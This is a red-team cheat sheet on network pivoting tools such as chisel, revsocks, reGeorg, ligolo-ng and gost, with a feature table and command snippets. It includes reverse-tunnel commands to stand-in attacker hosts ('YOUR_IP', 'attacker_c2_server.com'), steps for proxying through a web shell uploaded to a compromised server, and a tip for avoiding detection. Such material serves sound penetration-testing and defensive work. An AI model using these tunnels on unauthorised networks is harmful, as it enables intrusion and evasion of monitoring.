network-pivoting-tools.md (5841B)
1 --- 2 title: "Network Pivoting Tools" 3 section: "Red Team" 4 sectionSlug: "redteam" 5 sourcePath: "docs/redteam/pivoting/network-pivoting-tools.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/redteam/pivoting/network-pivoting-tools.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Network Pivoting Tools 12 13 ## Tools Comparison 14 15 Comparison table showing platform support (Windows, Linux, macOS), available polling methods (HTTPS, WebSockets), and supported SOCKS versions (4/5). 16 17 | Name | SOCKS4 | SOCKS5 | SOCKET | HTTPS | Web Socket | Windows | Linux | MacOS | Tun Interface | 18 | ---------- | ------ | ------ | ------ | ----- | ---------- | ------- | ----- | ----- | ------------- | 19 | SSH | ✅ | ✅ | ✅ | ❌ | ❌ | ✅ | ✅ | ✅ | ❌ | 20 | reGeorg | ✅ | ❌ | ✅ | ❌ | ❌ | ✅ | ✅ | ✅ | ❌ | 21 | pivotnacci | ✅ | ✅ | ❌ | ✅ | ❌ | ✅ | ✅ | ✅ | ❌ | 22 | wstunnel | ✅ | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | ✅ | ❌ | 23 | chisel | ❌ | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | ✅ | ❌ | 24 | revsocks | ❌ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ | ❌ | 25 | ligolo-ng | ❌ | ❌ | ✅ | ❌ | ✅ | ✅ | ✅ | ✅ | ✅ | 26 | gost | ✅ | ✅ | ✅ | ❌ | ❌ | ✅ | ✅ | ✅ | ✅ | 27 | rpivot | ✅ | ❌ | ✅ | ❌ | ❌ | ✅ | ✅ | ✅ | ❌ | 28 29 ## Tools 30 31 ### wstunnel 32 33 * [erebe/wstunnel](https://github.com/erebe/wstunnel) - Tunnel all your traffic over Websocket or HTTP2 - Bypass firewalls/DPI - Static binary available 34 35 ```ps1 36 wstunnel server wss://[::]:8080 37 wstunnel client -L socks5://127.0.0.1:8888 --connection-min-idle 5 wss://myRemoteHost:8080 38 curl -x socks5h://127.0.0.1:8888 http://google.com/ 39 ``` 40 41 ### chisel 42 43 * [jpillora/chisel](https://github.com/jpillora/chisel) - A fast TCP/UDP tunnel over HTTP 44 45 ```powershell 46 chisel server -p 8008 --reverse 47 chisel.exe client YOUR_IP:8008 R:socks 48 ``` 49 50 ### revsocks 51 52 * [kost/revsocks](https://github.com/kost/revsocks) - Reverse SOCKS5 implementation in Go 53 54 Reverse SOCKS using websocket 55 56 ```ps1 57 revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword -tls -ws 58 revsocks -connect https://clientIP:8443 -pass SuperSecretPassword -ws 59 ``` 60 61 Reverse SOCKS using TLS encryption 62 63 ```ps1 64 revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword 65 revsocks -connect clientIP:8443 -pass SuperSecretPassword 66 ``` 67 68 Reverse SOCKS using TCP 69 70 ```ps1 71 revsocks -listen :8443 -socks 127.0.0.1:1080 -pass SuperSecretPassword -tls 72 revsocks -connect clientIP:8443 -pass SuperSecretPassword -tls 73 ``` 74 75 * Set a strong password on the connection: `-pass Password1234` 76 * Use an authenticated proxy: `-proxy proxy.domain.local:3128 -proxyauth Domain/userpame:userpass` 77 * Define a User-Agent to reduce detections: `-useragent "Mozilla 5.0/IE Windows 10"` 78 79 ### ssh 80 81 ```bash 82 ssh -N -f -D [listenport] [user]@[host] 83 ``` 84 85 ### reGeorg 86 87 * [sensepost/reGeorg](https://github.com/sensepost/reGeorg), the successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn. 88 89 ```python 90 python reGeorgSocksProxy.py --listen-port 8080 --url http://compromised.host/shell.jsp 91 ``` 92 93 * **Step 1**. Upload tunnel.(`aspx|ashx|jsp|php`) to a webserver. 94 * **Step 2**. Configure you tools to use a socks proxy, use the ip address and port you specified when you started the reGeorgSocksProxy.py 95 96 ### pivotnacci 97 98 * [blackarrowsec/pivotnacci](https://github.com/blackarrowsec/pivotnacci), a tool to make socks connections through HTTP agents. 99 100 ```powershell 101 pip3 install pivotnacci 102 usage: pivotnacci [-h] [-s addr] [-p port] [--verbose] [--ack-message message] 103 [--password password] [--user-agent user_agent] 104 [--header header] [--proxy [protocol://]host[:port]] 105 [--type type] [--polling-interval milliseconds] 106 [--request-tries number] [--retry-interval milliseconds] 107 url 108 109 pivotnacci https://domain.com/agent.php --password "s3cr3t" --polling-interval 2000 110 ``` 111 112 ### ligolo 113 114 Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor. 115 116 * [nicocha30/ligolo-ng](https://github.com/nicocha30/ligolo-ng) - An advanced, yet simple, tunneling/pivoting tool that uses a TUN interface. 117 * [sysdream/ligolo](https://github.com/sysdream/ligolo) - Reverse Tunneling made easy for pentesters. 118 119 ```ps1 120 ./proxy -h # Help options 121 ./proxy -autocert # Automatically request LetsEncrypt certificates 122 ./proxy -selfcert # Use self-signed certificates 123 ./agent -connect attacker_c2_server.com:11601 124 125 ligolo-ng » session 126 ? Specify a session : 1 127 128 interface_create --name ligolo 129 route_add --name ligolo --route 10.24.0.0/24 130 tunnel_start --tun ligolo 131 ``` 132 133 ### gost 134 135 * [ginuerzh/gost](https://github.com/ginuerzh/gost) - GO Simple Tunnel - a simple tunnel written in golang 136 137 ```ps1 138 gost -L=socks5://:1080 # server 139 gost -L=:8080 -F=socks5://server_ip:1080?notls=true # client 140 ``` 141 142 ### sshuttle 143 144 * [sshuttle/sshuttle](https://github.com/sshuttle/sshuttle) - Transparent proxy server that works as a poor man's VPN. Forwards over ssh. 145 146 ```ps1 147 sshuttle -vvr user@10.10.10.10 10.1.1.0/24 148 sshuttle -vvr root@10.10.10.10 10.1.1.0/24 -e "ssh -i ~/.ssh/id_rsa" 149 ``` 150 151 ## References 152 153 * [GO Simple Tunnel - Documentation](https://gost.run/en/) 154 * [Ligolo-ng - Documentation](https://docs.ligolo.ng/) 155 * [sshutle - Documentation](https://sshuttle.readthedocs.io/en/stable/usage.html)